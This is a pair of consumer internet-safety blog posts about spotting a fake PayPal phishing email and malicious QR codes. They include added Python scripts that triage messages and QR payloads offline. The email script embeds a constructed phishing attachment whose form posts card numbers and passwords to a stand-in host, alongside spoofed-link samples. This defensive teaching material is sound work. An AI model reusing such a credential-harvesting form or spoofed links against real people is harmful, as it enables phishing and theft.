Protect yourself from fraudulent emails.

If you see an email with links you can click on, what should you do? Well, I will tell you what you should not do: you should not click on them unless you know what you are doing. I will give you an example from the real world. This comes from my very own email inbox. First, I will tell you that the sender of the email was “PayPal” (not the real one) and the message was this:

Dear Valued Member of PayPal, A very unusual activity has been detected that was linked to your PayPal account. It appears that someone gained access to your account without your consent. This intrusion have led us to restrict your account access. In order for you to have full access to your account again, please follow these two simple steps. (1) Download the attachment provided by our Security Team. (2) Open the attached file (in your Web Browser) and fill in the required fields. After you have verified your account by following these steps, our automated security system will add layers of protection to your account. We would like to thank you for your serious attention. Sincerely, PayPal Account Review Department

What do you think was the first thing I did about this? If you cannot guess, I will tell you that I opened a separate browser and logged into my account. No problems at all. The account was just fine. Now the first thing you should notice about this email is that they are asking you for personal and sensitive information by downloading an attachment, which in this case was an HTML file. Opened in your browser, a file like that shows a form that looks like a login page and sends whatever you type straight to the scammer's server; and because it is an attachment rather than a link, there is nothing to hover over to check where it goes. No legitimate company will ask you to fill in your password or card details in an attached file. That should be your first clue that this is a scam email. Your second clue should be that they address you as if they have no idea what your name is, with nothing in the message to show that they know anything about you, which is exactly what one would expect from a mass mailing designed to scam people. Your third clue is the bad English: “have led us” should be “has led us” because “intrusion” is singular and present tense, at least in my opinion, though this might be arguable. I’m not an expert in English grammar but this just sounds awkward to me.

The sender's email address was accounts@intl6.paye.com, which is very similar to a real PayPal email address (service@intl.paypal.com). Look past the part before the @ and past the sub-domain: what matters is the domain itself, and paye.com is not paypal.com. Bear in mind that the reverse does not hold either: the From address can be forged outright, so a sender address that does look right proves nothing on its own. Granted, there are many large departments within any organization like PayPal, so there are many email addresses that they use. I say to that: if in doubt, open a new browser, go to the main web page yourself and find out who to contact regarding an email they allegedly sent. But don’t under any circumstances reveal any personal information from within the email. In fact, don’t reply to it at all. Go directly to the real web page by typing in the address yourself.

As an aside, if you get an email asking if you want to change a subscription status (such as a newsletter), do not, like some of my clients have done, reply to the email hoping to get taken off a mailing list, especially if you are unfamiliar with the sender. If you do that, all you’ve accomplished is to verify that your email address is a live one that can be sold. Go directly to the web site in question, where you will almost always find links to remove yourself from any mailing lists.

Often you will forget the password for a favorite site and click its “Forgot Password” link, which sends you an email with a link you can click on to reset your own password. This is legitimate, and an action which you yourself initiated, so it is OK in this case to click on the link. However, it is still better in my opinion to copy the link and paste it into a new page in your web browser anyway. You may as well make it a habit.

If you see a link in your Internet browser, or in your email program, you can check where it really leads by merely hovering your mouse over the link without clicking on it. For example, here is a link I have created that points to the web site Google.

http://www.google.ca

Now hold your mouse over the link and you will see the real URL of the link. By the way, the term “URL” stands for “Uniform Resource Locator”, which is a geek way of saying “Internet address”. The real URL appears in the status bar at the lower left of your browser window. This is true in Firefox, in Internet Explorer, and in Google Chrome and Safari as well: hover your mouse over a link and the address it actually points to shows up at the lower left.

Here is another example, whose visible text is the same but whose underlying address is not:

http://www.google.ca

Now hover your mouse over this link and check out the real URL in the lower left bar of your browser window. What do you see there? Anything suspicious at all? (This is not a real web site, so do not try to click on it; it will just open an error page.) The point is that the text of a link and the address behind it are two separate things, and if you were to click on this one you would be taken to a web site that looks legitimate but is designed to steal your stuff. It is incredibly easy to fake a web site that looks like the real thing. All you have to do to disguise your nasty data-thieving web site code is to copy and paste a picture of the real web site over it. It looks like the real thing, but it does things you don’t want done to you.

I have not tested all the email programs out there, but the email clients I have tested (Outlook, Outlook Express, Windows Mail, Windows Live Mail), and also web-based email programs such as SquirrelMail, work in a similar way, except that when you hover your mouse over a link the real URL appears in a balloon pop-up right beside your mouse cursor.
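Hovering is a manual version of checks you can also do to a saved message without opening anything. The script below is an added example, not code from the post or from PayPal, and it runs on a constructed message modelled on the scam above (the sender accounts@intl6.paye.com and the hosts are illustrative stand-ins). It does the three things discussed so far: it pulls the domain out of the From address and compares it to the one you expect, it finds links whose visible text is an address on one domain while the href points at another, and it reads the HTML attachment to report where its form would post what you type. The registrable_domain helper is deliberately simplified (last two labels), which is fine for .com and .ca but not for domains like co.uk.

```python
"""Offline triage of a suspicious e-mail without clicking anything:
  1. does the From: address belong to the domain it claims?
  2. does a link's visible text name a different host than its href?
  3. if there is an HTML attachment, where would its <form> post your data?
"""
import email
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the scam in the post; sender, hosts and the
# tiny attachment are illustrative stand-ins, not the real messages.
SAMPLE_EML = """\
From: "PayPal" <accounts@intl6.paye.com>
Subject: Unusual activity detected
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Dear Valued Member of PayPal,</p>
<p>Log in: <a href="http://intl6.paye.com/login">https://www.paypal.com/signin</a></p>
<p>Questions? <a href="https://www.paypal.com/help">PayPal Help</a></p>
</body></html>
--b1
Content-Type: text/html; name="verify.html"
Content-Disposition: attachment; filename="verify.html"

<html><body><form action="http://intl6.paye.com/collect.php" method="post">
Card number: <input name="cc"> Password: <input name="pw"> <input type="submit">
</form></body></html>
--b1--
"""


class _Collector(HTMLParser):
    """Gathers (href, visible text) for each <a> and the action of each <form>."""
    def __init__(self):
        super().__init__()
        self.links, self.forms = [], []
        self._href, self._text = None, []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self._href, self._text = a["href"], []
        elif tag == "form":
            self.forms.append(a.get("action") or "")
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Lower-cased host of a URL; a bare 'www.x.com' is treated as http."""
    try:
        return (urlparse(url if "://" in url else "http://" + url).hostname or "").lower()
    except ValueError:
        return ""


def registrable_domain(host):
    """Simplified 'who owns this host': the last two labels. Good enough for
    .com/.ca; a public-suffix list would be needed for domains like co.uk."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def deceptive_links(links):
    """Links whose visible text is itself an address, on a different domain."""
    bad = []
    for href, text in links:
        if " " in text or "." not in text:   # plain words, not an address
            continue
        shown, real = host_of(text), host_of(href)
        if shown and real and registrable_domain(shown) != registrable_domain(real):
            bad.append((text, href))
    return bad


def triage(raw_eml, expected_domain):
    """Run all three checks on a raw message and return the findings."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    sender = parseaddr(str(msg["From"]))[1].rpartition("@")[2].lower()
    report = {
        "sender_domain": sender,
        # A matching domain is necessary, not sufficient: From: can be forged.
        "sender_ok": registrable_domain(sender) == expected_domain,
        "deceptive_links": [],
        "attachment_form_posts_to": [],
    }
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        c = _Collector()
        c.feed(part.get_content())
        if part.get_content_disposition() == "attachment":
            report["attachment_form_posts_to"] += [host_of(a) for a in c.forms if a]
        else:
            report["deceptive_links"] += deceptive_links(c.links)
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_EML, "paypal.com").items():
        print(f"{key}: {value}")
```

Run against the sample, it reports the sender domain as intl6.paye.com (not paypal.com), flags the link whose text reads https://www.paypal.com/signin but whose href goes to intl6.paye.com, leaves the plainly labelled “PayPal Help” link alone, and shows that the attached form would post your card number and password to intl6.paye.com. None of this required clicking or opening the attachment.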

So I will now post another real email I got just to demonstrate something to you. This is from the real PayPal:

Hello Jar Media Ltd.,

You recently attempted to transfer funds from your bank account to
your PayPal account.

Your bank declined the funds transfer on Dec 16, 2011.

We have charged your credit card, which you chose as your backup
funding source, to complete your payment to xxxx@xxxxxxxxx.com.

—————————————————————-
Transaction Details
—————————————————————-
Transaction Type: Instant Transfer payment to xxxxxxxxxxx.com
Transaction ID: xxxxxxxxxxxxxxx
Transaction Date: Dec 10, 2011
Transaction Amount: $xxx.xx CAD
Item number: xxxxxxxxxxxx

Thanks,

PayPal

—————————————————————-
PROTECT YOUR PASSWORD

NEVER give your password to anyone, including PayPal employees.
Protect yourself against fraudulent websites by opening a new web
browser (e.g. Internet Explorer or Firefox) and typing in the PayPal
URL every time you log in to your account.

—————————————————————-

Please do not reply to this email. This mailbox is not monitored and
you will not receive a response. For assistance, log in to your
PayPal account and click the Help link in the top right corner of
any PayPal page.

—————————————————————-
Copyright © 1999-2011 PayPal. All rights reserved.

PPID PP020

I want you to notice four things about this legitimate email. The first is that I replaced the real numbers and email addresses with xxx’s because they are none of your business, frankly. The second thing I want you to notice is that they addressed the company account, Jar Media Ltd., not some random impersonal “valued member”. The third thing is that they never once asked me for any personal information, and they did not publish any account information whatsoever in the email, not even the account number. Finally, the fourth thing I want you to notice is the paragraph they included under “PROTECT YOUR PASSWORD”: open a new browser and type the address in yourself, which is exactly the advice given above. By the way, the problem was a bank mistake and not that we are shiftless losers, ha ha! The account was fine, but a glitch caused the transaction to not be approved in time, hence the fallback to the credit card.

In future posts, I will talk about on-line security when shopping. I will also address how you can protect yourself from bogus software pop-ups when browsing the Internet. You know, the ones that pop up to tell you your computer is infected by a virus and you should click to install the perfect antivirus program? For now, I’ll just say you should never take the bait. That way I won’t have to carry your dead computer carcass home to disinfect it.

Peace.

Posted in Internet Safety | 1 Comment

QR Codes: How to protect yourself from malicious QR codes.

QR codes mostly look like this, although they can be much more artistic and look a lot like pictures:

An example of a QR code generated by me which takes you to our web site

If you have a smart phone you can read these things. Whether inside a retail store, at a bus stop, or printed in magazines, these codes are everywhere. A smart phone can scan them and then perform certain actions automatically. They are like a bar code, but they can carry a lot more information.

Here is a simplified version of how this works: you activate your smart phone camera in order to scan the image. Software inside your phone finds the code by its three large corner squares, reads each small square as one bit (dark or light), corrects any misread bits using the error-correction data built into the code, and converts the result into a string of characters which is then acted upon. The process is quite involved in detail, so to say that the software sees a black pixel and converts it to a binary bit is an oversimplification, but that is essentially how it works. It does this extremely fast.

What the software ultimately reads is just text, and it is the scanner app that decides what to do with that text. That may be to open an Internet browser and go to a web site (as with the QR code example above), or to open a Google map with the directions to a retail outlet, or to dial a phone number, or merely to display a short piece of text containing an advertisement, a discount coupon or a code.

This is all a great deal of fun and very useful, but there is a problem, and the problem is security. It is incredibly easy for someone to generate a malicious QR code which can attack your security in various ways, limited only by the actions QR codes are capable of triggering. It can take you to a spoofed web site and compromise your sensitive information. I could, if I wished, print out dozens of QR codes and stick them to bus stops, power poles, or anywhere the things will stick. I could even place one over a legitimate QR code from a local retail chain which an unsuspecting customer would trust to be safe to scan. The security problem is that there is no way to tell what is in a QR code except by scanning it. Even if the printing below it says the code will take you to a safe web site... well, that could be a lie too.

So how can you protect yourself? You can protect yourself in two ways. The first is never to scan them. The more practical way is to accept that no one can protect themselves at all times, but you can do some things which minimize the risk. For example, you might think it is fine to download a free QR code scanner application for your smart phone, and it is fine in the sense that these apps work. The problem is that many of them run the action in the QR code the instant they read it, without asking you. Free apps often have no settings to protect you. I recommend you pay for your apps. Make sure that the app you pay for (or the free app) lets you shut off autorun of whatever the QR code contains. For example, I have a free app which autoruns QR codes. There is no option to stop that other than simply not scanning. I also have a paid app which allows you to examine the code’s action before running it. Thus, if I scan a code that takes me to www.someretailer.com, here is what happens with my QR codes app: nothing at all, because I set it that way. I can then look at the decoded content and see that yes, it is indeed a web site address (as opposed to, say, a discount coupon code), that it is an address I recognize, and that there is no harm in going there. I can then choose to go there or not.

With my free app, it goes there instantly and automatically, which is no problem when it is a well-known and respected retailer or retail Internet commerce web site.

Question: What if it is instead something like this?

www.thisisamaliciouswebsite.com/wearegoingtostealyourinformation.php

With the free app you will be looking at the familiar but faked web site you know and love before you realize anything is wrong. With the paid app, or at least with a free app that allows you to control it, you will see the real URL first and know that something is up.
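The “examine before running” behaviour of the paid app is simple to express in code. The script below is an added example, not the code of any scanner app or of the post; it takes the text that a QR decoder library hands back (the decoding itself is not shown, and the payloads are constructed, including the www.thisisamaliciouswebsite.com address from above and a hypothetical retailer) and works out what the phone would actually do with it: open a web site, dial a number, open a map, or just show text. It goes a little beyond the post by also flagging a common trick the post does not mention, a URL with a decoy name before an “@” sign, where the browser ignores everything before the “@” and contacts the host after it; 198.51.100.23 is a documentation address used only as a stand-in.

```python
"""Preview a decoded QR payload before acting on it.

A QR code carries text; the scanner app decides what that text makes the
phone do. This is the 'look first' behaviour of the paid app in the post:
classify the payload, show what it would really do, and never auto-run.
"""
from urllib.parse import urlparse

# Constructed payloads, as a QR decoder library would hand them back.
SAMPLES = {
    "retailer": "https://www.someretailer.com/deals",
    "spoof": "http://www.thisisamaliciouswebsite.com/wearegoingtostealyourinformation.php",
    # The '@' trick: the browser ignores everything before '@'; the real
    # host is the IP address. 198.51.100.23 is a documentation address.
    "userinfo": "http://www.someretailer.com@198.51.100.23/login",
    "dial": "tel:+15551234567",
    "map": "geo:49.2827,-123.1207",
    "coupon": "SAVE20-XYZ",
}


def classify(payload):
    """Return (action, what it really does, warnings) for one payload."""
    p = payload.strip()
    scheme = p.split(":", 1)[0].lower() if ":" in p else ""
    warnings = []
    if scheme in ("http", "https"):
        u = urlparse(p)
        host = (u.hostname or "").lower()
        if u.username is not None:
            warnings.append(f"'{u.username}@' is a decoy; the browser will contact {host}")
        if host.replace(".", "").isdigit():
            warnings.append("destination is a bare IP address, not a named site")
        if scheme == "http":
            warnings.append("plain http: whatever you type there is sent unencrypted")
        # Show scheme, real host and path; port and query are dropped from the preview.
        return ("open website", f"{scheme}://{host}{u.path or '/'}", warnings)
    if scheme == "tel":
        return ("dial number", p[len("tel:"):], warnings)
    if scheme == "geo":
        return ("open map at", p[len("geo:"):], warnings)
    return ("show text", p, warnings)  # coupons, adverts: nothing leaves the app


def needs_confirmation(payload):
    """Anything that leaves the scanner app, or carries a warning, must be
    confirmed by the user. Only plain text is safe to display straight away."""
    action, _, warnings = classify(payload)
    return action != "show text" or bool(warnings)


def preview(payload):
    """The one line a scanner should show instead of acting: the real destination."""
    action, detail, warnings = classify(payload)
    line = f"{action}: {detail}"
    if warnings:
        line += "  [WARNING: " + "; ".join(warnings) + "]"
    if needs_confirmation(payload):
        line += "  (tap to confirm)"
    return line


if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(f"{name:9} -> {preview(payload)}")
```

For the retailer code the preview reads “open website: https://www.someretailer.com/deals (tap to confirm)”, which is exactly the check described above. For the “@” sample the preview shows that the phone would really contact 198.51.100.23, not www.someretailer.com, and the coupon is the only payload that is displayed without asking, because displaying text is the one action that cannot take you anywhere.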

Which brings me, finally, to say something about free apps in general. Free apps just are not free. There is always, always, always a ‘catch’. Granted, some ‘catches’ are harmless and friendly, but many are annoying and some are even harmful. You do not get what you do not pay for, in other words. It is the same with free software off the Internet. Downloader beware!

Having warned you about free apps and free software, there are plenty of legitimate software packages which are indeed extremely high quality and free, such as OpenOffice by Sun Microsystems, WordPress, and many others, often written under the GNU GPL license. This is open source software written by people who just love writing software.

Being aware of security risks is the first step to taking control of your own security. Have fun scanning QR codes now that you know the risks! I will discuss other security issues in another post soon after this holiday season. So whatever your beliefs, have a great holiday season, everyone, and see you in the new year!

Posted in Internet Safety | 2 Comments